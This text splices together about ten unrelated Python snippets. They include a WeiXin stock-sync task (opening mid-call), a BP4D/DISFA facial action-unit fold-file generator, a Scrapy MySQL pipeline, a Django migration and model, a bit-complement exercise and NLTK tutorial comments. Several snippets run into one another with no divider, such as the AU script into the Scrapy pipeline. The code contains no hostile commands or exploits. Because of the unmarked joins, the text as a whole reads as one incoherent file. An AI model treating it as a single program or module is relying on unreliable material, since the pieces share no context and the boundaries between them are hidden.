                                                 sku_outer_id='wx%s'%outer_sku_id,
                                                 num=sync_num,
                                                 end_at=datetime.datetime.now())
@task
def syncWXProductNumTask():
    """Refresh the product list from WeiXin, then sync stock for every
    product still on shelf."""
    pullWXProductTask()
    wx_products = WXProduct.objects.filter(status=WXProduct.UP_SHELF)
    for wx_product in wx_products:
        syncStockByWxShopTask(wx_product)
|
f = open("one.txt", "r")
print(f.read())
print()
f = open("one.txt", "r")
print(f.readline())
print(f.readline())
f = open("one.txt", "r")
print(f.read(10))
|
import os
import config
from sklearn.model_selection import KFold
import numpy as np
from collections import defaultdict
import math
# Leave one subject out
# data format (tab-separated):
#   image_path    label1,label2,?ignored_label1,...    #_or_orig_img_path    BP4D/DISFA
# The third column is "#" when image_path is the original (untransformed)
# image; otherwise it holds the source path the transformed image came from.
# NOTE: the function below is currently unused.
def get_BP4D_AU_intensity():
    """Read the BP4D AU-intensity csv files into a nested mapping.

    Returns
    -------
    defaultdict
        video_name -> frame (int) -> AU code (str) -> intensity (int).
    """
    video_frame_AU = defaultdict(dict)
    root_dir = config.DATA_PATH["BP4D"] + "AU-Intensity-Codes3.0"
    for AU_folder in os.listdir(root_dir):
        # Folder names look like "AU06". BUG FIX: the original reassigned the
        # loop variable (AU = AU[2:]) inside the inner loop, which stripped
        # the code repeatedly after the first csv AND broke the open() path
        # (the directory is "AU06" but it opened ".../06/..."). Strip once,
        # keep the folder name for path construction.
        AU = AU_folder[2:]
        for csv_file_name in os.listdir(root_dir + os.sep + AU_folder):
            # csv files are named "<video_name>_<...>.csv".
            video_name = csv_file_name[:csv_file_name.rindex("_")]
            with open(root_dir + os.sep + AU_folder + os.sep + csv_file_name, "r") as file_obj:
                for line in file_obj:
                    frame, AU_intensity = line.strip().split(",")
                    frame = int(frame)
                    AU_intensity = int(AU_intensity)
                    if frame not in video_frame_AU[video_name]:
                        video_frame_AU[video_name][frame] = dict()
                    video_frame_AU[video_name][frame][AU] = AU_intensity
    return video_frame_AU
def single_AU_RCNN_BP4D_subject_id_file(idx_folder_path, kfold=None, validation_size=3000): # partition_path is dict{"trn":..., "valid":xxx}
    """Generate per-AU, subject-independent k-fold index files for BP4D.

    For each AU in config.paper_use_BP4D: reads the AUCoding csv files,
    keeps every frame whose image exists on disk, and (when kfold is set)
    writes id_trainval_i / id_test_i / id_valid_i text files per fold plus a
    full_pretrain.txt, oversampling positive lines to balance the classes.

    Parameters
    ----------
    idx_folder_path : str
        Root folder for the generated "AU_x/k_fold" index files.
    kfold : int or None
        Number of subject-level folds; nothing is written when None.
    validation_size : int
        Number of test lines sampled (without replacement) for id_valid.
    """
    for BP4D_AU in config.paper_use_BP4D:
        full_pretrain = set()
        subject_video = defaultdict(dict)  # subject id -> {sequence: [frame dicts]}
        for file_name in os.listdir(config.DATA_PATH["BP4D"] + "/AUCoding"):
            if not file_name.endswith(".csv"): continue
            # csv names look like "<subject>_<sequence>.csv".
            subject_name = file_name.split("_")[0]
            sequence_name = file_name[file_name.rindex("_") + 1:file_name.rindex(".")]
            video_dir = config.RGB_PATH["BP4D"] + os.sep + subject_name + os.sep + sequence_name
            # Frame numbers in the csv are zero-padded to the width of the
            # first image file name in the sequence folder.
            first_frame_file_name = os.listdir(video_dir)[0]
            first_frame_file_name = first_frame_file_name[:first_frame_file_name.rindex(".")]
            frame_len = len(first_frame_file_name)
            AU_column_idx = dict()
            print("reading:{}".format("{0}/{1}".format(config.DATA_PATH["BP4D"] + "/AUCoding", file_name)))
            with open("{0}/{1}".format(config.DATA_PATH["BP4D"] + "/AUCoding", file_name), "r") as au_file_obj:
                for idx, line in enumerate(au_file_obj):
                    if idx == 0: # header specify Action Unit
                        for col_idx, _AU in enumerate(line.split(",")[1:]):
                            AU_column_idx[_AU] = col_idx + 1 # read header
                        continue # read head over , continue
                    lines = line.split(",")
                    frame = lines[0].zfill(frame_len)
                    img_file_path = video_dir + os.sep + frame+".jpg"
                    if os.path.exists(img_file_path):
                        AU_set = set()
                        if int(lines[AU_column_idx[BP4D_AU]]) == 1:
                            AU_set.add(BP4D_AU)
                        if len(AU_set) == 0:
                            AU_set.add("0")  # this frame shows no AU
                        if sequence_name not in subject_video[subject_name]:
                            subject_video[subject_name][sequence_name] = list()
                        subject_video[subject_name][sequence_name].append({"img_path":img_file_path, "AU_label":AU_set,
                                                                           "database":"BP4D",
                                                                           "frame":frame, "video_name": "{0}_{1}".format(subject_name, sequence_name)})
        print("reading AU-coding file done")
        subject_name_ls = np.array(list(subject_video.keys()), dtype=str)
        if kfold is not None:
            # Folds split on subjects so no subject spans train and test.
            kf = KFold(n_splits=kfold, shuffle=True)
            i = 0
            folder_path = "{0}/AU_{1}/{2}_fold".format(idx_folder_path, BP4D_AU, kfold)
            if not os.path.exists(folder_path):
                os.makedirs(folder_path)
            for train_index, test_index in kf.split(subject_name_ls):
                i += 1
                train_name_array = subject_name_ls[train_index]
                test_name_array = subject_name_ls[test_index]
                balance_line = defaultdict(list) # AU : write_lines
                for subject_name in train_name_array:
                    for info_dict in subject_video[subject_name].values():
                        for video_info in info_dict:
                            orig_from_path = "#"  # "#" marks a non-transformed image
                            AU_set = video_info["AU_label"]
                            img_file_path = os.sep.join(video_info["img_path"].split(os.sep)[-3:])
                            AU_set_str = ",".join(AU_set)
                            line = "{0}\t{1}\t{2}\t{3}\n".format(img_file_path, AU_set_str, orig_from_path, "BP4D")
                            full_pretrain.add(line)
                            balance_line[AU_set_str].append(line)
                # Oversample non-"0" (positive) lines by the majority/minority
                # class ratio to balance the training file.
                ratio = max(len(lines) for lines in balance_line.values()) // min(
                    len(lines) for lines in balance_line.values())
                new_lines = []
                for AU_set_str, lines in balance_line.items():
                    if AU_set_str != "0":
                        for _ in range(ratio):
                            for line in lines:
                                new_lines.append(line)
                balance_line[BP4D_AU].extend(new_lines)
                with open("{0}/id_trainval_{1}.txt".format(folder_path, i), "w") as file_obj:
                    for AU_set_str, lines in balance_line.items():
                        for line in lines:
                            file_obj.write(line)
                    file_obj.flush()
                validate_lines = []
                with open("{0}/id_test_{1}.txt".format(folder_path, i), "w") as file_obj:
                    for subject_name in test_name_array:
                        for info_dict in subject_video[subject_name].values():
                            for video_info in info_dict:
                                orig_from_path = "#"
                                AU_set = video_info["AU_label"]
                                img_file_path = os.sep.join(video_info["img_path"].split(os.sep)[-3:])
                                AU_set_str = ",".join(AU_set)
                                line = "{0}\t{1}\t{2}\t{3}\n".format(img_file_path, AU_set_str, orig_from_path, "BP4D")
                                validate_lines.append(line)
                                full_pretrain.add(line)
                                file_obj.write("{}".format(line))
                    file_obj.flush()
                # The validation file is a random subset of the test lines.
                validate_lines = np.random.choice(validate_lines, validation_size, replace=False)
                with open("{0}/id_valid_{1}.txt".format(folder_path, i), "w") as file_obj:
                    for line in validate_lines:
                        file_obj.write("{}".format(line))
                    file_obj.flush()
            with open("{0}/full_pretrain.txt".format(folder_path), "w") as file_obj:
                for line in full_pretrain:
                    file_obj.write(line)
                file_obj.flush()
def single_AU_DISFA_subject_id_file(idx_folder_path, kfold=None, partition_file_path=None):
    """Generate per-AU, subject-independent k-fold index files for DISFA.

    For each AU in config.paper_use_DISFA: reads the per-video AU intensity
    label files (intensity >= 1 counts as AU present), pairs labels with
    Left/Right camera images that exist on disk, and (when kfold is set)
    writes id_trainval_i / id_test_i / id_valid_i files per fold with
    class-balancing oversampling on the training split.
    """
    for DISFA_AU in config.paper_use_DISFA:
        DISFA_base_dir = config.DATA_PATH["DISFA"]
        label_file_dir = DISFA_base_dir + "/ActionUnit_Labels/"
        subject_video = defaultdict(dict)  # video (subject) -> orientation -> frame dicts
        orientations = ["Left", "Right"]
        for video_name in os.listdir(label_file_dir):
            frame_label = {}
            for label_file_name in os.listdir(label_file_dir+os.sep+video_name):
                # Label files embed the AU code: "...au<NN>.<ext>".
                AU = label_file_name[label_file_name.index("au") + 2: label_file_name.rindex(".")]
                if AU != DISFA_AU:
                    continue
                with open(label_file_dir+os.sep+video_name+os.sep+label_file_name, "r") as file_obj:
                    for line in file_obj:
                        line = line.strip()
                        if line:
                            frame, AU_intensity = line.split(",")
                            AU_intensity = int(AU_intensity)
                            if frame not in frame_label:
                                frame_label[frame] = set()
                            if AU_intensity >= 1:  # FIXME: is >= 1 the right threshold?
                                frame_label[frame].add(AU)
            for orientation in orientations:
                img_folder = DISFA_base_dir + "/Img_{}Camera".format(orientation)
                for frame, AU_set in sorted(frame_label.items(), key=lambda e:int(e[0])):
                    if orientation not in subject_video[video_name]:
                        subject_video[video_name][orientation] = []
                    img_file_path = img_folder + "/" + video_name + "/" + frame + ".jpg"
                    if os.path.exists(img_file_path):
                        subject_video[video_name][orientation].append({"img_path":img_file_path, "AU_label":AU_set,
                                                                       "database":"DISFA"})
        subject_name_ls = np.array(list(subject_video.keys()), dtype=str)
        if kfold is not None:
            # Folds split on videos (subjects) for subject independence.
            kf = KFold(n_splits=kfold, shuffle=True)
            i = 0
            for train_index, test_index in kf.split(subject_name_ls):
                i += 1
                train_name_array = subject_name_ls[train_index]
                test_name_array = subject_name_ls[test_index]
                folder_path = "{0}/AU_{1}/{2}_fold".format(idx_folder_path, DISFA_AU, kfold)
                print(folder_path)
                if not os.path.exists(folder_path):
                    os.makedirs(folder_path)
                balance_line = defaultdict(list) # DISFA_AU : write_lines
                for video_name in train_name_array:
                    for orientation, video_info_lst in subject_video[video_name].items():
                        for video_info in video_info_lst:
                            img_file_path = video_info["img_path"]
                            img_file_path = os.sep.join(img_file_path.split("/")[-3:])
                            AU_set_str = ",".join(video_info["AU_label"])
                            if len(video_info["AU_label"]) == 0:
                                AU_set_str = "0"  # no AU in this frame
                            orig_from_path = "#"
                            line = "{0}\t{1}\t{2}\t{3}\n".format(img_file_path, AU_set_str,orig_from_path,video_info["database"])
                            balance_line[AU_set_str].append(line)
                # Oversample positive lines by the class-imbalance ratio.
                ratio = max(len(lines) for lines in balance_line.values()) // min(len(lines) for lines in balance_line.values())
                new_lines = []
                for AU_set_str, lines in balance_line.items():
                    if AU_set_str != "0":
                        for _ in range(ratio):
                            for line in lines:
                                new_lines.append(line)
                balance_line[DISFA_AU].extend(new_lines)
                with open("{0}/id_trainval_{1}.txt".format(folder_path, i), "w") as file_obj:
                    for AU_set_str, lines in balance_line.items():
                        for line in lines:
                            file_obj.write(line)
                    file_obj.flush()
                with open("{0}/id_test_{1}.txt".format(folder_path, i), "w") as file_obj:
                    for video_name in test_name_array:
                        for orientation, video_info_lst in subject_video[video_name].items():
                            for video_info in video_info_lst:
                                img_file_path = video_info["img_path"]
                                img_file_path = os.sep.join(img_file_path.split("/")[-3:])
                                AU_set_str = ",".join(video_info["AU_label"])
                                if len(video_info["AU_label"]) == 0:
                                    AU_set_str = "0"
                                orig_from_path = "#"
                                file_obj.write("{0}\t{1}\t{2}\t{3}\n".format(img_file_path, AU_set_str,orig_from_path,video_info["database"]))
                    file_obj.flush()
                # NOTE(review): id_valid duplicates id_test verbatim here,
                # unlike the BP4D variant which samples a subset.
                with open("{0}/id_valid_{1}.txt".format(folder_path, i), "w") as file_obj:
                    for video_name in test_name_array:
                        for orientation, video_info_lst in subject_video[video_name].items():
                            for video_info in video_info_lst:
                                img_file_path = video_info["img_path"]
                                img_file_path = os.sep.join(img_file_path.split("/")[-3:])
                                AU_set_str = ",".join(video_info["AU_label"])
                                if len(video_info["AU_label"]) == 0:
                                    AU_set_str = "0"
                                orig_from_path = "#"
                                file_obj.write("{0}\t{1}\t{2}\t{3}\n".format(img_file_path, AU_set_str,orig_from_path,video_info["database"]))
                    file_obj.flush()
def gen_BP4D_subject_id_file(idx_folder_path, kfold=None, partition_path=None, validation_size=3000): # partition_path is dict{"trn":..., "valid":xxx}
    """Generate multi-AU, subject-independent index files for BP4D.

    Unlike the single-AU variants, every AU in config.AU_ROI is encoded per
    frame; a coding value of 9 becomes "?AU" (label to ignore). Writes k-fold
    files (id_trainval/id_test/id_valid + full_pretrain) when kfold is set,
    and/or an official train/validate partition when partition_path (a dict
    with "trn" and "valid" subject-list file paths) is given.

    NOTE(review): BP4D_lines is returned but never populated — callers always
    receive an empty set.
    """
    subject_video = defaultdict(dict)  # subject id -> {sequence: [frame dicts]}
    BP4D_lines = set()
    pretrained_full = set()
    for file_name in os.listdir(config.DATA_PATH["BP4D"] + "/AUCoding"):
        if not file_name.endswith(".csv"): continue
        # csv names look like "<subject>_<sequence>.csv".
        subject_name = file_name.split("_")[0]
        sequence_name = file_name[file_name.rindex("_") + 1:file_name.rindex(".")]
        video_dir = config.RGB_PATH["BP4D"] + os.sep + subject_name + os.sep + sequence_name
        # Frame numbers are zero-padded to the width of the first image name.
        first_frame_file_name = os.listdir(video_dir)[0]
        first_frame_file_name = first_frame_file_name[:first_frame_file_name.rindex(".")]
        frame_len = len(first_frame_file_name)
        AU_column_idx = dict()
        print("reading:{}".format("{0}/{1}".format(config.DATA_PATH["BP4D"] + "/AUCoding", file_name)))
        with open("{0}/{1}".format(config.DATA_PATH["BP4D"] + "/AUCoding", file_name), "r") as au_file_obj:
            for idx, line in enumerate(au_file_obj):
                if idx == 0: # header specify Action Unit
                    for col_idx, AU in enumerate(line.split(",")[1:]):
                        AU_column_idx[AU] = col_idx + 1 # read header
                    continue # read head over , continue
                lines = line.split(",")
                frame = lines[0].zfill(frame_len)
                img_file_path = video_dir + os.sep + frame+".jpg"
                if os.path.exists(img_file_path):
                    AU_set = set()
                    for AU in config.AU_ROI.keys():
                        if int(lines[AU_column_idx[AU]]) == 1:
                            AU_set.add(AU)
                        elif int(lines[AU_column_idx[AU]]) == 9:
                            # 9 means "unknown" in BP4D coding -> ignore label.
                            AU_set.add("?{}".format(AU))
                    if len(AU_set) == 0 or not list(filter(lambda e: not e.startswith("?"), AU_set)):
                        AU_set.add("0")  # this frame shows no (certain) AU
                    if sequence_name not in subject_video[subject_name]:
                        subject_video[subject_name][sequence_name] = list()
                    subject_video[subject_name][sequence_name].append({"img_path":img_file_path, "AU_label":AU_set, "database":"BP4D"})
    print("reading AU-coding file done")
    subject_name_ls = np.array(list(subject_video.keys()), dtype=str)
    if kfold is not None:
        # Folds split on subjects for subject independence.
        kf = KFold(n_splits=kfold, shuffle=True)
        i = 0
        folder_path = "{0}/{1}_fold".format(idx_folder_path, kfold)
        if not os.path.exists(folder_path):
            os.makedirs(folder_path)
        for train_index, test_index in kf.split(subject_name_ls):
            i += 1
            train_name_array = subject_name_ls[train_index]
            test_name_array = subject_name_ls[test_index]
            with open("{0}/id_trainval_{1}.txt".format(folder_path, i), "w") as file_obj:
                for subject_name in train_name_array:
                    for info_dict in subject_video[subject_name].values():
                        for video_info in info_dict:
                            orig_from_path = "#"  # "#" marks a non-transformed image
                            AU_set = video_info["AU_label"]
                            img_file_path = os.sep.join(video_info["img_path"].split(os.sep)[-3:])
                            AU_set_str = ",".join(AU_set)
                            line = "{0}\t{1}\t{2}\t{3}".format(img_file_path, AU_set_str, orig_from_path, "BP4D")
                            pretrained_full.add(line)
                            file_obj.write("{}\n".format(line))
                file_obj.flush()
            validate_lines = []
            with open("{0}/id_test_{1}.txt".format(folder_path, i), "w") as file_obj:
                for subject_name in test_name_array:
                    for info_dict in subject_video[subject_name].values():
                        for video_info in info_dict:
                            orig_from_path = "#"
                            AU_set = video_info["AU_label"]
                            img_file_path = os.sep.join(video_info["img_path"].split(os.sep)[-3:])
                            AU_set_str = ",".join(AU_set)
                            line = "{0}\t{1}\t{2}\t{3}".format(img_file_path, AU_set_str, orig_from_path, "BP4D")
                            validate_lines.append(line)
                            pretrained_full.add(line)
                            file_obj.write("{}\n".format(line))
                file_obj.flush()
            # The validation file is a random subset of the test lines.
            validate_lines = np.random.choice(validate_lines, validation_size, replace=False)
            with open("{0}/id_valid_{1}.txt".format(folder_path, i), "w") as file_obj:
                for line in validate_lines:
                    file_obj.write("{}\n".format(line))
                file_obj.flush()
        with open("{}/full_pretrain.txt".format(folder_path), "w") as file_obj:
            for line in pretrained_full:
                file_obj.write("{}\n".format(line))
            file_obj.flush()
    if partition_path is not None:
        # Official partition: subject names are listed one per line in the
        # "trn" and "valid" files.
        trn_subject_name = []
        validate_subject_name = []
        trn_subject_file_path = partition_path["trn"]
        valid_subject_file_path = partition_path["valid"]
        with open(trn_subject_file_path, "r") as file_obj:
            for line in file_obj:
                line = line.strip()
                if line:
                    trn_subject_name.append(line)
        with open(valid_subject_file_path, "r") as file_obj:
            for line in file_obj:
                line = line.strip()
                if line:
                    validate_subject_name.append(line)
        folder_path = idx_folder_path + "/official_partition"
        if not os.path.exists(folder_path):
            os.makedirs(folder_path)
        with open("{}/id_train.txt".format(folder_path), "w") as file_obj:
            for subject_name in trn_subject_name:
                for info_dict in subject_video[subject_name].values():
                    for video_info in info_dict:
                        orig_from_path = "#"
                        AU_set = video_info["AU_label"]
                        img_file_path = os.sep.join(video_info["img_path"].split(os.sep)[-3:])
                        AU_set_str = ",".join(AU_set)
                        line = "{0}\t{1}\t{2}\t{3}".format(img_file_path, AU_set_str, orig_from_path, video_info["database"])
                        file_obj.write("{}\n".format(line))
            file_obj.flush()
        with open("{}/id_validate.txt".format(folder_path), "w") as file_obj:
            for subject_name in validate_subject_name:
                for info_dict in subject_video[subject_name].values():
                    for video_info in info_dict:
                        orig_from_path = "#"
                        AU_set = video_info["AU_label"]
                        img_file_path = os.sep.join(video_info["img_path"].split(os.sep)[-3:])
                        AU_set_str = ",".join(AU_set)
                        line = "{0}\t{1}\t{2}\t{3}".format(img_file_path, AU_set_str, orig_from_path, video_info["database"])
                        file_obj.write("{}\n".format(line))
            file_obj.flush()
    return BP4D_lines
def gen_DISFA_subject_id_file(idx_folder_path, kfold=None, partition_file_path=None):
    """
    Build image-index files for the DISFA dataset.

    Reads per-AU intensity files under ``<DISFA>/ActionUnit_Labels/``, marks an
    AU active for a frame when its intensity is >= 1, pairs each labelled frame
    with the Left/Right camera images that exist on disk, and (when ``kfold``
    is given) writes subject-wise split files ``id_trainval_<i>.txt`` /
    ``id_test_<i>.txt`` / ``id_valid_<i>.txt``.

    Each output line is: img_path <TAB> AU_set <TAB> "#" <TAB> database.

    Parameters
    ----------
    idx_folder_path : str
        Root folder in which the ``<kfold>_fold`` output directory is created.
    kfold : int or None
        Number of subject-wise folds; nothing is written when None.
    partition_file_path : unused
        NOTE(review): accepted but never read in this function — presumably
        kept for signature parity with the BP4D variant; confirm before removing.
    """
    DISFA_base_dir = config.DATA_PATH["DISFA"]
    label_file_dir = DISFA_base_dir + "/ActionUnit_Labels/"
    subject_video = defaultdict(dict)  # key is subject id
    orientations = ["Left", "Right"]
    for video_name in os.listdir(label_file_dir):
        frame_label = {}  # frame number (str) -> set of active AU codes
        for label_file_name in os.listdir(label_file_dir+os.sep+video_name):
            # AU code is embedded in the label file name, e.g. "..._au12.txt" -> "12"
            AU = label_file_name[label_file_name.index("au") + 2: label_file_name.rindex(".")]
            with open(label_file_dir+os.sep+video_name+os.sep+label_file_name, "r") as file_obj:
                for line in file_obj:
                    line = line.strip()
                    if line:
                        frame, AU_intensity = line.split(",")
                        AU_intensity = int(AU_intensity)
                        if frame not in frame_label:
                            frame_label[frame] = set()
                        if AU_intensity >= 1:  # FIXME: should the threshold be raised to >= 3?
                            frame_label[frame].add(AU)
        for orientation in orientations:
            img_folder = DISFA_base_dir + "/Img_{}Camera".format(orientation)
            # Iterate frames in numeric order so output lines are sorted by frame.
            for frame, AU_set in sorted(frame_label.items(), key=lambda e:int(e[0])):
                if orientation not in subject_video[video_name]:
                    subject_video[video_name][orientation] = []
                img_file_path = img_folder + "/" + video_name + "/" + frame + ".jpg"
                # Skip frames whose image file is missing on disk.
                if os.path.exists(img_file_path):
                    subject_video[video_name][orientation].append({"img_path":img_file_path, "AU_label":AU_set,
                                                                   "database":"DISFA"})
    subject_name_ls = np.array(list(subject_video.keys()), dtype=str)
    if kfold is not None:
        # Split by subject (not by frame) so no subject appears in both sides.
        kf = KFold(n_splits=kfold, shuffle=True)
        i = 0
        for train_index, test_index in kf.split(subject_name_ls):
            i += 1  # fold numbering starts at 1
            train_name_array = subject_name_ls[train_index]
            test_name_array = subject_name_ls[test_index]
            folder_path = "{0}/{1}_fold".format(idx_folder_path, kfold)
            print(folder_path)
            if not os.path.exists(folder_path):
                os.makedirs(folder_path)
            with open("{0}/id_trainval_{1}.txt".format(folder_path, i), "w") as file_obj:
                for video_name in train_name_array:
                    for orientation, video_info_lst in subject_video[video_name].items():
                        for video_info in video_info_lst:
                            img_file_path = video_info["img_path"]
                            # Keep only the last 3 path components (relative path).
                            img_file_path = os.sep.join(img_file_path.split("/")[-3:])
                            AU_set_str = ",".join(video_info["AU_label"])
                            if len(video_info["AU_label"]) == 0:
                                AU_set_str = "0"  # "0" marks a frame with no active AU
                            orig_from_path = "#"
                            file_obj.write("{0}\t{1}\t{2}\t{3}\n".format(img_file_path, AU_set_str,orig_from_path,video_info["database"]))
                file_obj.flush()
            with open("{0}/id_test_{1}.txt".format(folder_path, i), "w") as file_obj:
                for video_name in test_name_array:
                    for orientation, video_info_lst in subject_video[video_name].items():
                        for video_info in video_info_lst:
                            img_file_path = video_info["img_path"]
                            img_file_path = os.sep.join(img_file_path.split("/")[-3:])
                            AU_set_str = ",".join(video_info["AU_label"])
                            if len(video_info["AU_label"]) == 0:
                                AU_set_str = "0"
                            orig_from_path = "#"
                            file_obj.write("{0}\t{1}\t{2}\t{3}\n".format(img_file_path, AU_set_str,orig_from_path,video_info["database"]))
                file_obj.flush()
            # NOTE(review): the validation file duplicates the test split —
            # confirm this is intentional.
            with open("{0}/id_valid_{1}.txt".format(folder_path, i), "w") as file_obj:
                for video_name in test_name_array:
                    for orientation, video_info_lst in subject_video[video_name].items():
                        for video_info in video_info_lst:
                            img_file_path = video_info["img_path"]
                            img_file_path = os.sep.join(img_file_path.split("/")[-3:])
                            AU_set_str = ",".join(video_info["AU_label"])
                            if len(video_info["AU_label"]) == 0:
                                AU_set_str = "0"
                            orig_from_path = "#"
                            file_obj.write("{0}\t{1}\t{2}\t{3}\n".format(img_file_path, AU_set_str,orig_from_path,video_info["database"]))
                file_obj.flush()
if __name__ == "__main__":
    from dataset_toolkit.adaptive_AU_config import adaptive_AU_database
    #
    # adaptive_AU_database("BP4D")
    # partition = {"trn":"/home/machen/dataset/BP4D/idx/trn_partition.txt",
    #              "valid":"/home/machen/dataset/BP4D/idx/validate_partition.txt"}
    # gen_BP4D_subject_id_file("{0}/{1}".format(config.DATA_PATH["BP4D"], "idx"), kfold=10, validation_size=1000)
    # Configure the AU label set for DISFA, then generate its 3-fold index files.
    adaptive_AU_database("DISFA")
    # single_AU_RCNN_BP4D_subject_id_file("{0}/{1}".format(config.ROOT_PATH + os.sep+"/BP4D/", "idx"), kfold=3)
    gen_DISFA_subject_id_file("{0}/{1}".format(config.ROOT_PATH + os.sep+"/DISFA_1/", "idx"), kfold=3)
    # gen_BP4D_subject_id_file("{0}/{1}".format(config.DATA_PATH["BP4D"], "idx"), kfold=10)
    # gen_BP4D_subject_id_file("{0}/{1}".format(config.DATA_PATH["BP4D"], "idx"), kfold=3)
    # print("done")
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import json
from twisted.enterprise import adbapi
from hashlib import md5
import MySQLdb.cursors
import logging
# Module-level logger: DEBUG and above go to dianping.log, ERROR and above to
# the console, both using the same timestamped format.
log = logging.getLogger("dianping")
formatter = logging.Formatter('%(name)-12s %(asctime)s %(levelname)-8s %(message)s', '%a, %d %b %Y %H:%M:%S',)
file_handler = logging.FileHandler("dianping.log")
file_handler.setLevel(logging.DEBUG)
stream_handler = logging.StreamHandler()
stream_handler.setLevel(logging.ERROR)
file_handler.setFormatter(formatter)
stream_handler.setFormatter(formatter)
log.addHandler(file_handler)
log.addHandler(stream_handler)
class TutorialPipeline(object):
    """No-op pipeline: passes every item through unchanged."""

    def process_item(self, item, spider):
        """Return *item* untouched so downstream pipelines receive it."""
        return item
class JsonWriterPipeline(object):
    """Write each scraped item as one JSON object per line (JSON Lines)."""

    def __init__(self):
        # Bug fix: the file was opened in binary mode ('wb'), but
        # json.dumps() returns str — writing str to a binary handle raises
        # TypeError on Python 3. Open in text mode instead.
        self.file = open('items.jl', 'w')

    def process_item(self, item, spider):
        """Append *item* to items.jl and pass it through unchanged."""
        line = json.dumps(dict(item)) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        """Release the file handle when the spider finishes."""
        self.file.close()
class MySQLStorePipeline(object):
    """Asynchronously store scraped shops in MySQL, de-duplicated by an md5 id."""

    def __init__(self, dbpool):
        self.dbpool = dbpool

    @classmethod
    def from_crawler(cls, crawler):
        """Build the Twisted connection pool from crawler settings."""
        dbargs = dict(
            host=crawler.settings.get('MYSQL_HOST'),
            db=crawler.settings.get('MYSQL_DBNAME'),
            user=crawler.settings.get('MYSQL_USER'),
            passwd=crawler.settings.get('MYSQL_PASSWD'),
            charset='utf8',
            cursorclass=MySQLdb.cursors.DictCursor,
            use_unicode=True,
        )
        dbpool = adbapi.ConnectionPool('MySQLdb', **dbargs)
        return cls(dbpool)

    def process_item(self, item, spider):
        """Schedule the insert on the pool; never blocks the crawl."""
        d = self.dbpool.runInteraction(self._insert, item, spider)
        d.addErrback(self.__handle_error, item, spider)
        return item

    def _insert(self, conn, item, spider):
        """Insert *item* unless a row with the same md5 id already exists."""
        md5id = self._get_md5id(item)
        # Security fix: use DB-API parameter binding instead of %-formatting
        # values into the SQL string — the old code broke on quotes in shop
        # names and was an SQL-injection vector.
        conn.execute("select 1 from dianping where md5id = %s", (md5id,))
        ret = conn.fetchone()
        if ret:
            # logging.warn is a deprecated alias; use warning().
            log.warning("Item already stored in db: %s" % item)
        else:
            conn.execute("insert into dianping(md5id, shop_name, shop_address, "
                         "shop_region, shop_city, shop_latitude, shop_longitude) "
                         "values (%s, %s, %s, %s, %s, %s, %s)",
                         (md5id, item["shop_name"], item["shop_address"], item["shop_region"],
                          item["shop_city"], item["shop_latitude"], item["shop_longitude"]))
            log.info("Item stored in db: %s" % item)

    def __handle_error(self, e, item, spider):
        """Log any failure from the deferred insert."""
        log.error(e)

    def _get_md5id(self, item):
        """Stable de-duplication key: md5 of name + coordinates."""
        return md5(" ".join([item["shop_name"], item["shop_latitude"],
                             item["shop_longitude"]]).encode("utf8")).hexdigest()
|
from terminaltables import AsciiTable
from colorclass import Color
def colored_status(status, text):
    """Wrap *text* in terminal color markup matching the scenario status."""
    if status == u'passed':
        markup = '{autogreen}%s{/autogreen}'
    elif status == u'skipped':
        markup = '{autocyan}%s{/autocyan}'
    else:
        # Any other status (failed, undefined, ...) renders red.
        markup = '{autored}%s{/autored}'
    return Color(markup % text)
def two_decimals(number):
    """Render *number* with exactly two digits after the decimal point."""
    return format(number, ".2f")
def print_overview_features(features):
    """Print an ASCII table with one row per scenario across all features."""
    rows = [['Feature', 'Scenario', 'Duration']]
    rows.extend(
        [feature.filename,
         colored_status(scenario.status, scenario.name),
         two_decimals(scenario.duration)]
        for feature in features
        for scenario in feature.scenarios)
    print(AsciiTable(rows).table)
|
"""
Wrapper API for the native OS.
"""
import os
from mamp_cli.base import ApiBase
class OsApi(ApiBase):
    """Wrapper API for the native OS."""

    def __init__(self, config: "Config"):
        # Bug fix: the annotation is quoted because ``Config`` is never
        # imported in this module — an unquoted annotation raises NameError
        # the moment the class body is evaluated.
        pass
|
# Generated by Django 2.1.7 on 2019-03-30 22:29
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: changes Meta options only (ordering and
    verbose names), no schema change."""

    dependencies = [
        ('budget', '0027_auto_20190329_0719'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='subcategory',
            options={'ordering': ['class_field_id', 'name'], 'verbose_name_plural': 'subcategories'},
        ),
        migrations.AlterModelOptions(
            name='transactionclass',
            options={'verbose_name_plural': 'transaction classes'},
        ),
    ]
|
from django.db import models
# Create your models here.
class orderDetails_db(models.Model):
    """A food-delivery order placed by a student, identified by roll number."""

    # auto_now: refreshed on every save, not just creation.
    timestamp = models.DateTimeField(auto_now=True)
    rollNo = models.IntegerField()
    itemName = models.CharField(max_length=100)
    # Bug fixes: the module is imported as ``models`` (not ``model``);
    # ``choices`` must be a list of (stored_value, label) tuples, not the
    # dict-style literal the original had (a SyntaxError); and max_length=1
    # could not hold values like 'zomato'.
    company = models.CharField(max_length=10, choices=[
        ('zomato', 'Zomato'),
        ('swiggy', 'Swiggy'),
        ('other', 'other'),
    ])
    # NOTE(review): an IntegerField overflows for 10-digit phone numbers on
    # 32-bit integer columns — consider CharField or BigIntegerField.
    deliveryGuyContact = models.IntegerField()

    def __str__(self):
        # __str__ must return a str; rollNo is an int.
        return str(self.rollNo)
|
# An easy string/bit-manipulation exercise.
def findComplement(num):
    """
    Return the integer whose binary representation is the bitwise complement
    of num's (ignoring leading zeros), e.g. 5 = 0b101 -> 0b010 = 2.

    :type num: int
    :rtype: int
    """
    # Flip every bit of the binary string. The original built the same string
    # with a loop and also contained a dangling ``''.join(result)`` statement
    # whose value was discarded — a no-op that has been removed.
    flipped = ''.join('1' if bit == '0' else '0' for bit in bin(num)[2:])
    return int(flipped, 2)
if __name__ == '__main__':
    # Smoke test: 5 = 0b101 -> complement 0b010 = 2.
    print(findComplement(5))
# Natural Language Processing With Python and NLTK p.1 Tokenizing words and Sentences
# import nltk
from nltk.tokenize import sent_tokenize, word_tokenize
# tokenizing - word tokenizer... sentence tokenizer = way of splitting strings
# lexicon and corporas
# corpora - body of text. ex: medical journal, presidential speeches, English language
# lexicon - words and their means
# investor-speak... regular english-speak
# investor speak 'bull' = someone who is positive about the market
# english speak 'bull' = scary animal you don't want running @ you
